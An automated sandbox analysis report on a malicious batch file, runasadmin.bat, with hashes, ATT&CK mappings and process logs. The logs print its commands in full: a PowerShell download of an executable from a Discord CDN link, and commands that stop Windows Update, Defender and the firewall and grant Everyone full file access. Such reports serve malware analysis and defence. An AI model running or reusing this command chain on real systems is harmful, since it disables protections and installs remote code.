61d3ded7796d8e1e237a9d5b29dfa3c85bd8a7b0851158683b7182c8693efc5f

General

Target

runasadmin.bat
Size

1KB
MD5

8c6d25434d4d9d6c230a727a90b3e111
SHA1

bb21e80767f6c2f6fcc382eeb0c67afc7294dae9
SHA256

61d3ded7796d8e1e237a9d5b29dfa3c85bd8a7b0851158683b7182c8693efc5f
SHA512

a9f81718046624aaf8c391e390dba81250f6c346e9aec4e929ca6a60eaecac5928ec961df91b2c520fa99b50481b8310192d8576cf1e20cb0d4129b8aadc194c

Score

10^/10

discovery evasion execution exploit

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1956 powershell.exe
Modifies Windows Firewall 2 TTPs 7 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

5016 netsh.exe
4904 netsh.exe
1712 netsh.exe
2308 netsh.exe
2780 netsh.exe
4268 netsh.exe
1444 netsh.exe
Possible privilege escalation attempt 3 IoCs
exploit

Processes:

icacls.exeicacls.exetakeown.exe

pid process

4672 icacls.exe
4652 icacls.exe
2636 takeown.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exe

pid process

2636 takeown.exe
4672 icacls.exe
4652 icacls.exe
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

4104 sc.exe
4628 sc.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4368 timeout.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1956 powershell.exe
1956 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1956 powershell.exe

pid	process
1956	powershell.exe

pid	process
5016	netsh.exe
4904	netsh.exe
1712	netsh.exe
2308	netsh.exe
2780	netsh.exe
4268	netsh.exe
1444	netsh.exe

pid	process
4672	icacls.exe
4652	icacls.exe
2636	takeown.exe

pid	process
2636	takeown.exe
4672	icacls.exe
4652	icacls.exe

pid	process
4104	sc.exe
4628	sc.exe

pid	process
4368	timeout.exe

pid	process
1956	powershell.exe
1956	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1956	powershell.exe

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

cmd.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 1100 wrote to memory of 1956	1100	cmd.exe	powershell.exe
PID 1100 wrote to memory of 1956	1100	cmd.exe	powershell.exe
PID 1100 wrote to memory of 4104	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 4104	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 4628	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 4628	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 3504	1100	cmd.exe	net.exe
PID 1100 wrote to memory of 3504	1100	cmd.exe	net.exe
PID 3504 wrote to memory of 4952	3504	net.exe	net1.exe
PID 3504 wrote to memory of 4952	3504	net.exe	net1.exe
PID 1100 wrote to memory of 1760	1100	cmd.exe	net.exe
PID 1100 wrote to memory of 1760	1100	cmd.exe	net.exe
PID 1760 wrote to memory of 3980	1760	net.exe	net1.exe
PID 1760 wrote to memory of 3980	1760	net.exe	net1.exe
PID 1100 wrote to memory of 2636	1100	cmd.exe	takeown.exe
PID 1100 wrote to memory of 2636	1100	cmd.exe	takeown.exe
PID 1100 wrote to memory of 4672	1100	cmd.exe	icacls.exe
PID 1100 wrote to memory of 4672	1100	cmd.exe	icacls.exe
PID 1100 wrote to memory of 4652	1100	cmd.exe	icacls.exe
PID 1100 wrote to memory of 4652	1100	cmd.exe	icacls.exe
PID 1100 wrote to memory of 3420	1100	cmd.exe	net.exe
PID 1100 wrote to memory of 3420	1100	cmd.exe	net.exe
PID 3420 wrote to memory of 2692	3420	net.exe	net1.exe
PID 3420 wrote to memory of 2692	3420	net.exe	net1.exe
PID 1100 wrote to memory of 2732	1100	cmd.exe	net.exe
PID 1100 wrote to memory of 2732	1100	cmd.exe	net.exe
PID 2732 wrote to memory of 2552	2732	net.exe	net1.exe
PID 2732 wrote to memory of 2552	2732	net.exe	net1.exe
PID 1100 wrote to memory of 2308	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 2308	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 2780	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 2780	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 4268	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 4268	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 1444	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 1444	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 5016	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 5016	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 4904	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 4904	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 1712	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 1712	1100	cmd.exe	netsh.exe
PID 1100 wrote to memory of 4368	1100	cmd.exe	timeout.exe
PID 1100 wrote to memory of 4368	1100	cmd.exe	timeout.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\runasadmin.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1239070337228865601/1242889939524259870/shutdown.exe?ex=664f7af5&is=664e2975&hm=8334727a2bec5b610b6e37fcf28e25d2d51052e173836b06f92cce2cff19e593& -OutFile C:\shutdown.exe"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Windows\system32\sc.exe
sc config "wuauserv" start= disabled
2⤵
- Launches sc.exe
PID:4104

C:\Windows\system32\sc.exe
sc config "TrustedInstaller" start= disabled
2⤵
- Launches sc.exe
PID:4628

C:\Windows\system32\net.exe
net stop wuauserv
2⤵
- Suspicious use of WriteProcessMemory
PID:3504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wuauserv
3⤵
PID:4952

C:\Windows\system32\net.exe
net stop TrustedInstaller
2⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrustedInstaller
3⤵
PID:3980

C:\Windows\system32\takeown.exe
takeown /F C:\X\Y\Z /A /R
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2636

C:\Windows\system32\icacls.exe
icacls C:\X\Y\Z /grant Everyone:F /T
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4672

C:\Windows\system32\icacls.exe
icacls . /grant Everyone:F /T /C /Q
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4652

C:\Windows\system32\net.exe
net stop "Windows Defender Service"
2⤵
- Suspicious use of WriteProcessMemory
PID:3420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Defender Service"
3⤵
PID:2692

C:\Windows\system32\net.exe
net stop "Windows Firewall"
2⤵
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Firewall"
3⤵
PID:2552

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
2⤵
- Modifies Windows Firewall
PID:2308

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
2⤵
- Modifies Windows Firewall
PID:2780

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
2⤵
- Modifies Windows Firewall
PID:4268

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
2⤵
- Modifies Windows Firewall
PID:1444

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
2⤵
- Modifies Windows Firewall
PID:5016

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
2⤵
- Modifies Windows Firewall
PID:4904

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:1712

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
2⤵
- Delays execution with timeout.exe
PID:4368

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

System Services

1

T1569

Service Execution

1

T1569.002

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Privilege Escalation

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Defense Evasion

Impair Defenses

1

T1562

Disable or Modify System Firewall

1

T1562.004

File and Directory Permissions Modification

1

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5cdywult.iq3.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1956-0-0x00007FFCAA423000-0x00007FFCAA425000-memory.dmp

Filesize
8KB

Download
memory/1956-1-0x000001F8CE6E0000-0x000001F8CE702000-memory.dmp

Filesize
136KB

Download
memory/1956-11-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmp

Filesize
10.8MB

Download
memory/1956-12-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmp

Filesize
10.8MB

Download
memory/1956-15-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmp

Filesize
10.8MB

Download
memory/1956-16-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing